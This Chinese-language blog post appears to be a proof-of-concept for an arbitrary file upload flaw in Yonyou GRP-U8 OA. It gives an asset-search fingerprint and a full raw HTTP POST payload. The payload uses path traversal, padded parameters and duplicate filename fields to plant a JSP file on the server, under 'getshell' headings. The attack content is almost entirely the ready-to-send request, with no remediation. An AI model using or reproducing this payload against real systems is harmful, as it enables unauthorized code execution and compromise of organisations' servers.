用友GRP-U8 OA文件上传

漏洞
Created At :
Views 👀 :
  1. 用友GRP-U8 OA上传
    1. 页面
    2. payload

用友GRP-U8 OA上传

app.name=”用友GRP-U8 OA”

页面

image.png

payload

POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=test.jsp&filename=1.jpg HTTP/1.1
Host: XXX.XXX.XXX:99
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------192386535332116664783811905534
Content-Length: 263
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/
Upgrade-Insecure-Requests: 1

-----------------------------192386535332116664783811905534
Content-Disposition: form-data; name="myFile"; filename="1.jpg"
Content-Type: application/x-php

<%out.print("test vulnerability!");%>
-----------------------------192386535332116664783811905534--

上传
image.png

getshell
image.png

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。

©2016-2020 Yelog

Built with Hexo and 3-hexo theme